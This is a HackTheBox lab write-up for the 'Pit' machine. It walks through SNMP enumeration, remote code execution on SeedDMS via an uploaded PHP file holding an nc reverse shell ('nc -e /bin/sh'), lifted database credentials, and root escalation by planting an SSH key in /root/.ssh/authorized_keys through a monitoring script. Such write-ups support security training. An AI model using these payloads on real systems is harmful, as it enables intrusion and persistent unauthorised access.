Pit - [HTB]

Cover Image for Pit - [HTB]
Marmeus
Marmeus

Introduction

Pit is a medium-hard CentOs machine from HackTheBox where the attacker will have to enumerate through an SNMP service finding a new web application for an RCE. Later, he or she will have to use the information from the SNMP service to find a vulnerable script which allow the attacker to retrieve the root flag.

Enumeration

As always, let's start finding all opened ports in the machine, but this time we will also need enumerate the UDP openend ports.

kali@kali:~/Documents/HTB/PIT$ sudo nmap -sS -p- -n -T4 10.10.10.241 -oN AllPorts.txt
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-15 22:31 CEST
Nmap scan report for 10.10.10.241
Host is up (0.087s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
9090/tcp open  zeus-admin

kali@kali:~/Documents/HTB/PIT$ sudo nmap -sU -n 10.10.10.241
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-17 16:52 EDT
Host is up (0.049s latency).
PORT    STATE         SERVICE
161/udp open|filtered snmp

There are four openend ports, let's continue with a deeper scan.

kali@kali:~/Documents/HTB/PIT$ sudo nmap -sC -sV -p22,80,9090 -n -oN DepthPorts.txt 10.10.10.241
Nmap scan report for 10.10.10.241
Host is up (0.12s latency).

PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
|   256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7 (ECDSA)
|_  256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50 (ED25519)
80/tcp   open  http            nginx 1.14.1
|_http-server-header: nginx/1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
161/tcp  filtered snmp 
9090/tcp open  ssl/zeus-admin?
[...]
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
| Not valid before: 2020-04-16T23:29:12
|_Not valid after:  2030-06-04T16:09:12
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9090-TCP:V=7.91%T=SSL%I=7%D=5/15%Time=60A01CC6%P=x86_64-pc-linux-gn
[...]
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 15 15:13:12 2021 -- 1 IP address (1 host up) scanned in 197.40 seconds

kali@kali:~/Documents/HTB/PIT$ sudo nmap -sU -sC -sV -p 161 -oN output.txt 10.10.10.241
Nmap scan report for 10.10.10.241
Host is up (0.060s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 4ca7e41263c5985e00000000
|   snmpEngineBoots: 73
|_  snmpEngineTime: 18m24s
| snmp-processes: 
|   1: 
|     Name: systemd
|     Path: /usr/lib/systemd/systemd
|     Params: --switched-root --system --deserialize 18
[...]
|_    Params: -s
| snmp-sysdescr: Linux pit.htb 4.18.0-305.10.2.el8_4.x86_64 #1 SMP Tue Jul 20 17:25:16 UTC 2021 x86_64
|_  System uptime: 18m24.10s (110410 timeticks)
Service Info: Host: pit.htb

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Thanks to nmap we obtain two domains pit.htb and dms-pit.htb

After a ton of enumeration on each service, finally enumerating the the private enterpise numbers of the SNMP service wer can find a web directory and some usernames.

Note: Posts about SNMP enumeration.

kali@kali:~/Documents/HTB/PIT$ snmpwalk -c public pit.htb -v 1 enterprise
[...]
UCD-SNMP-MIB::dskPath.2 = STRING: /var/www/html/seeddms51x/seeddms
[...]
NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendCommand."monitoring" = STRING: /usr/bin/monitor
NET-SNMP-EXTEND-MIB::nsExtendArgs."monitoring" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendInput."monitoring" = STRING: 
[...]
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".25 = STRING: Login Name           SELinux User         MLS/MCS Range        Service            
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".26 = STRING:          
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".27 = STRING: __default__          unconfined_u         s0-s0:c0.c1023       *                  
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".28 = STRING: michelle             user_u               s0                   *                  
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".29 = STRING: root                 unconfined_u         s0-s0:c0.c1023       *    

In order to access to the web page we can do it through this URL. However, we need some credentials

SeedDMS login

It turns out that the credentials for the login page are michelle:michelle.

Explotation

Looking at the "Upgrade Note" we can figure it out that they are using a SeedDMS v5.1.15.

SeedDMS version

This version has an exploit associated it, allowing us to execute commands on the machine. Nonetheless, we need to do it manually.

kali@kali:~/Documents/HTB/PIT$ gedit NmapSnmp.txt 
kali@kali:~/Documents/HTB/PIT$ searchsploit seeddms
---------------------------------------------------------------- ---------------------------------
 Exploit Title                                                   |  Path
---------------------------------------------------------------- ---------------------------------
SeedDMS 5.1.18 - Persistent Cross-Site Scripting                | php/webapps/48324.txt
SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting      | php/webapps/47024.txt
SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting        | php/webapps/47023.txt
SeedDMS versions < 5.1.11 - Remote Command Execution            | php/webapps/47022.txt
---------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

Accesding to DMS/Docs/Users/Michelle/ we can a "Add Document" to the server. In my case the file was the following.

Note: After 5 minutes every file is deleted so you will have to uploaded it several times.

kali@kali:~/Documents/HTB/PIT$ cat shell.php
<?php shell_exec("nc -e /bin/sh <iP> 4444");?>

Now, we need to figure out the documentid of our file, as you can see in the following image.

SeedDMS documentID

After that, we can access the file with the following URL, obtaining our reverse shell.

http://dms-pit.htb/seeddms51x/data/1048576/<DocumentID>/1.php

Inside the file /var/www/html/seeddms51x/conf/settings.xml there are the credentials for the database which passsword can be used for getting access as michelle to the <strong data-reactroot="">Cockpit</strong> web page at port 9090.

<database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms" dbUser="seeddms" dbPass="ied^ieY6xoquu" doNotCheckVersion="false">
Cockpit web page

Using the terminal we can obtain the user flag.

Privilege escalation

Looking once again in the snmpwalk service we can see a weird file.

kali@kali:~/Documents/HTB/PIT$ snmpwalk -v 1 -c public pit.htb enterprise 
[...]
UCD-SNMP-MIB::dskErrorFlag.2 = INTEGER: error(1)
NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendCommand."monitoring" = STRING: /usr/bin/monitor
NET-SNMP-EXTEND-MIB::nsExtendArgs."monitoring" = STRING: 
NET-SNMP-EXTEND-MIB::nsExtendInput."monitoring" = STRING: 

Looking its contents we can seee that executes every file named check+<whatever>+sh stored at /usr/local/monitoring/.

[michelle@pit ~]$ cat /usr/bin/monitor
#!/bin/bash

for script in /usr/local/monitoring/check*sh
do
    /bin/bash $script
done

In order to obtain a shell as root we have to appent our pub SSH key into the /root/.ssh/authorized_keys. To do so you can execute the following command.

[michelle@pit ~]$ echo -e "mkdir /root/.ssh/; echo '<Your Pub ssh key>' >> /root/.ssh/authorized_keys" > /usr/local/monitoring/check.sh

Finally, in order to execute the monitor file we only need to execute the snmpwalk command one final time and access to the machine through SSH as root.

kali@kali:~/Documents/HTB/PIT$ snmpwalk -v 1 -c public pit.htb enterprise
[...]
kali@kali:~/Documents/HTB/PIT$ ssh root@pit.htb
Web console: https://pit.htb:9090/      
Last login: Mon May 17 16:33:43 2021 from 10.10.14.56
[root@pit ~]# cat root.txt
[...]